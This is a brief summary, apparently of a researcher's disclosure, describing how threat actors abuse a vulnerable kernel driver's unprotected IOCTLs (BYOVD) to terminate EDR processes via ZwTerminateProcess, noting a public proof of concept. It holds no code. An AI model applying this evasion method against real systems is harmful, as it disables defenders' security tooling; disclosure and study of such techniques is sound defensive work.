EDR Evasion Technique Using a Vulnerable Kernel Driver

The author shares a vulnerability discovered during malware research, where threat actors exploit vulnerable kernel drivers (Bring Your Own Vulnerable Driver - BYOVD) to bypass EDR solutions. The driver in question exposes unprotected IOCTLs, allowing a usermode application to invoke ZwTerminateProcess to kill targeted processes, such as those of EDRs. Despite being a known issue, the flaw is not blocked by Microsoft. A PoC (Proof of Concept) is available on GitHub.